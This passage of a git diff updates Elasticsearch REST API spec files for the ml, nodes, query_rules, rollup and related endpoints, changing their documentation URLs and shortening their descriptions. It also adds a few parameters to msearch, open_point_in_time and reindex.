b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json index f237c45c4b241..2714d76071ac6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json @@ -1,8 +1,8 @@ { "ml.update_filter":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-filter.html", - "description":"Updates the description of a filter, adds items, or removes items." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-filter", + "description":"Update a filter" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json index 69bdcd0100d49..226f11554ef32 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_job.json @@ -1,8 +1,8 @@ { "ml.update_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html", - "description":"Updates certain properties of an anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-job", + "description":"Update an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json index 77414590371f1..36c9be3c03c82 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_model_snapshot.json @@ -1,8 +1,8 @@ { "ml.update_model_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html", - "description":"Updates certain properties of a snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-model-snapshot", + "description":"Update a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json index cc505e873b442..09201207ebce2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_trained_model_deployment.json @@ -1,8 +1,8 @@ { "ml.update_trained_model_deployment":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-trained-model-deployment.html", - "description":"Updates certain properties of trained model deployment." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-trained-model-deployment", + "description":"Update a trained model deployment" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json index 22de8d4915ad0..14a3fda799d79 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.upgrade_job_snapshot.json @@ -1,8 +1,8 @@ { "ml.upgrade_job_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-upgrade-job-model-snapshot.html", - "description":"Upgrades a given job snapshot to the current major version." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-upgrade-job-snapshot", + "description":"Upgrade a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json index b57f1bb69ffa1..86520a1d15edd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate.json @@ -2,7 +2,7 @@ "ml.validate":{ "documentation":{ "url":"https://www.elastic.co/guide/en/machine-learning/current/ml-jobs.html", - "description":"Validates an anomaly detection job." + "description":"Validate an anomaly detection job" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json index 1400da1ccee09..8af3d9c0414c9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.validate_detector.json @@ -2,7 +2,7 @@ "ml.validate_detector":{ "documentation":{ "url":"https://www.elastic.co/guide/en/machine-learning/current/ml-jobs.html", - "description":"Validates an anomaly detection detector." + "description":"Validate an anomaly detection job" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json b/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json index 35f1a9dd13646..08019b70f9114 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/monitoring.bulk.json @@ -1,8 +1,8 @@ { "monitoring.bulk":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/monitor-elasticsearch-cluster.html", - "description":"Used by the monitoring features to send monitoring data." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch", + "description":"Send monitoring data" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json index 359d1e67b07e5..9f39bfb12dc5e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch.json @@ -1,8 +1,8 @@ { "msearch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-multi-search.html", - "description":"Allows to execute several search operations in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-msearch", + "description":"Run multiple searches" }, "stability":"stable", "visibility":"public", @@ -69,6 +69,38 @@ "type":"boolean", "description":"Indicates whether network round-trips should be minimized as part of cross-cluster search requests execution", "default":"true" + }, + "index":{ + "type":"list", + "description":"A comma-separated list of index names to use as default" + }, + "ignore_unavailable":{ + "type":"boolean", + "description":"Whether specified concrete indices should be ignored when unavailable (missing or closed)" + }, + "ignore_throttled":{ + "type":"boolean", + "description":"Whether specified concrete, expanded or aliased indices should be ignored when throttled", + "deprecated":true + }, + "allow_no_indices":{ + "type":"boolean", + "description":"Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)" + }, + "expand_wildcards":{ + "type":"enum", + "options": ["open", "closed", "hidden", "none", "all"], + "default":"open", + "description":"Whether to expand wildcard expression to concrete indices that are open, closed or both." + }, + "routing":{ + "type":"list", + "description":"A comma-separated list of specific routing values" + }, + "include_named_queries_score":{ + "type":"boolean", + "description":"Indicates whether hit.matched_queries should be rendered as a map that includes the name of the matched query associated with its score (true) or as an array containing the name of the matched queries (false)", + "default": false } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json index 38b1d5b6add09..a8c4ebd526031 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/msearch_template.json @@ -1,8 +1,8 @@ { "msearch_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-multi-search.html", - "description":"Allows to execute several search template operations in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-msearch-template", + "description":"Run multiple templated searches" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json b/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json index fd7a5493363e3..55b5b6796e727 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/mtermvectors.json @@ -1,8 +1,8 @@ { "mtermvectors":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-termvectors.html", - "description":"Returns multiple termvectors in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mtermvectors", + "description":"Get multiple term vectors" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json index 3edcb98e8b2e3..767662682f6b4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.clear_repositories_metering_archive.json @@ -1,8 +1,8 @@ { "nodes.clear_repositories_metering_archive":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/clear-repositories-metering-archive-api.html", - "description":"Removes the archived repositories metering information present in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-clear-repositories-metering-archive", + "description":"Clear the archived repositories metering" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json index 312b6b6c82eea..5d9c5e9edca3c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.get_repositories_metering_info.json @@ -1,8 +1,8 @@ { "nodes.get_repositories_metering_info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-repositories-metering-api.html", - "description":"Returns cluster repositories metering information." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-get-repositories-metering-info", + "description":"Get cluster repositories metering" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json index 8c8794e05c282..ed47c7a3b2601 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.hot_threads.json @@ -1,8 +1,8 @@ { "nodes.hot_threads":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-hot-threads.html", - "description":"Returns information about hot threads on each node in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-hot-threads", + "description":"Get the hot threads for nodes" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json index a4cf6481c553f..5f33d6084c9ac 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json @@ -1,8 +1,8 @@ { "nodes.info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-info.html", - "description":"Returns information about nodes in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-info", + "description":"Get node information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json index 777a62a7dc3af..adc2bf8c2f4d2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json @@ -1,8 +1,8 @@ { "nodes.reload_secure_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/secure-settings.html#reloadable-secure-settings", - "description":"Reloads secure settings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-reload-secure-settings", + "description":"Reload the keystore on nodes in the cluster" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json index e3ae508b8b1ce..56ac9cce6ba80 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json @@ -1,8 +1,8 @@ { "nodes.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-stats.html", - "description":"Returns statistical information about nodes in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-stats", + "description":"Get node statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json index 09aeaba8fec01..3620ad69af42c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json @@ -1,8 +1,8 @@ { "nodes.usage":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-usage.html", - "description":"Returns low-level information about REST actions usage on nodes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-usage", + "description":"Get feature usage information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json b/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json index 6f3d09c15c081..e06050283ca9a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json @@ -1,8 +1,8 @@ { "open_point_in_time":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/point-in-time-api.html", - "description":"Open a point in time that can be used in subsequent searches" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-open-point-in-time", + "description":"Open a point in time" }, "stability":"stable", "visibility":"public", @@ -59,6 +59,11 @@ "allow_partial_search_results": { "type": "boolean", "description": "Specify whether to tolerate shards missing when creating the point-in-time, or otherwise throw an exception. (default: false)" + }, + "max_concurrent_shard_requests": { + "type": "number", + "description": "The number of concurrent shard requests per node executed concurrently when opening this point-in-time. This value should be used to limit the impact of opening the point-in-time on the cluster", + "default": 5 } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json index 6615f789623f8..99c9b19c27803 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json @@ -1,8 +1,8 @@ { "ping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Returns whether the cluster is running." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cluster", + "description":"Ping the cluster" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json index 51e313178ecbe..390c950951516 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json @@ -2,7 +2,7 @@ "profiling.flamegraph":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Extracts a UI-optimized structure to render flamegraphs from Universal Profiling." + "description":"Extracts a UI-optimized structure to render flamegraphs from Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json index 13d44dc61db13..5242ec630da61 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json @@ -2,7 +2,7 @@ "profiling.stacktraces":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Extracts raw stacktrace information from Universal Profiling." + "description":"Extracts raw stacktrace information from Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json index 76296e1079be2..adc7c3d4f7355 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json @@ -2,7 +2,7 @@ "profiling.status":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Returns basic information about the status of Universal Profiling." + "description":"Returns basic information about the status of Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json index 3b4db3abf2cca..3643f3b0268d1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json @@ -2,7 +2,7 @@ "profiling.topn_functions":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Extracts a list of topN functions from Universal Profiling." + "description":"Extracts a list of topN functions from Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json b/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json index 29e951848ddd8..e300335770c31 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json @@ -1,8 +1,8 @@ { "put_script":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Creates or updates a script." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-put-script", + "description":"Create or update a script or search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json index 8a97dcd311237..49331c28a355a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json @@ -1,8 +1,8 @@ { "query_rules.delete_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-query-rule.html", - "description": "Deletes an individual query rule within a ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-delete-rule", + "description": "Delete a query rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json index 90144ca9f3cf5..c1c4a1537bedf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json @@ -1,8 +1,8 @@ { "query_rules.delete_ruleset": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-query-ruleset.html", - "description": "Deletes a query ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-delete-ruleset", + "description": "Delete a query ruleset" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json index 681b68ab583d8..a24dea752459c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json @@ -1,8 +1,8 @@ { "query_rules.get_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-query-rule.html", - "description": "Returns the details about an individual query rule within a ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-get-rule", + "description": "Get a query rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json index 28268ea667b8c..cf89a9db50fb6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json @@ -1,8 +1,8 @@ { "query_rules.get_ruleset": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-query-ruleset.html", - "description": "Returns the details about a query ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-get-ruleset", + "description": "Get a query ruleset" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json index e3e98adedb147..cc4138f0a554d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json @@ -1,8 +1,8 @@ { "query_rules.list_rulesets": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-query-rulesets.html", - "description": "Lists query rulesets." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-list-rulesets", + "description": "Get all query rulesets" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json index 5cc21b4f3249c..c2fefafe842a6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json @@ -1,8 +1,8 @@ { "query_rules.put_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-query-rule.html", - "description": "Creates or updates a query rule within a ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-put-rule", + "description": "Create or update a query rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json index 12cbccc6b7651..ae1b8efc3dd95 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json @@ -1,8 +1,8 @@ { "query_rules.put_ruleset": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-query-ruleset.html", - "description": "Creates or updates a query ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-put-ruleset", + "description": "Create or update a query ruleset" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json index c82b45771ac7f..82c236d57dbc7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json @@ -1,8 +1,8 @@ { "query_rules.test": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/test-query-ruleset.html", - "description": "Tests a query ruleset to identify the rules that would match input criteria" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-test", + "description": "Test a query ruleset" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json index e7d40bbe3bdf0..b1f7567bc5938 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json @@ -1,8 +1,8 @@ { "rank_eval":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-rank-eval.html", - "description":"Allows to evaluate the quality of ranked search results over a set of typical search queries" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rank-eval", + "description":"Evaluate ranked search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json index f8038853e4731..ef420a4a16b45 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json @@ -1,8 +1,8 @@ { "reindex":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html", - "description":"Allows to copy documents from one index to another, optionally filtering the source\ndocuments by a query, changing the destination index settings, or fetching the\ndocuments from a remote cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex", + "description":"Reindex documents" }, "stability":"stable", "visibility":"public", @@ -57,6 +57,11 @@ "max_docs":{ "type":"number", "description":"Maximum number of documents to process (default: all documents)" + }, + "require_alias":{ + "type":"boolean", + "default":false, + "description":"When true, requires destination to be an alias." } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json index f53157c36cc64..03cba3a7fa4a8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json @@ -1,8 +1,8 @@ { "reindex_rethrottle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html", - "description":"Changes the number of requests per second for a particular Reindex operation." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex", + "description":"Throttle a reindex operation" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json index 5a29c99612a75..8ecb065adc19f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json @@ -1,8 +1,8 @@ { "render_search_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/render-search-template-api.html", - "description":"Allows to use the Mustache language to pre-render a search definition." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-render-search-template", + "description":"Render a search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json index 0a60a10ed8315..fa82143228f12 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json @@ -1,8 +1,8 @@ { "rollup.delete_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-delete-job.html", - "description":"Deletes an existing rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-delete-job", + "description":"Delete a rollup job" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json index e373c9f08bfd5..c15aee0ce06f4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json @@ -1,8 +1,8 @@ { "rollup.get_jobs":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-get-job.html", - "description":"Retrieves the configuration, stats, and status of rollup jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-jobs", + "description":"Get rollup job information" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json index a72187f9ca926..cc3729ced3307 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json @@ -1,8 +1,8 @@ { "rollup.get_rollup_caps":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-get-rollup-caps.html", - "description":"Returns the capabilities of any rollup jobs that have been configured for a specific index or index pattern." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-rollup-caps", + "description":"Get the rollup job capabilities" }, "stability":"experimental", "visibility":"public", diff --git 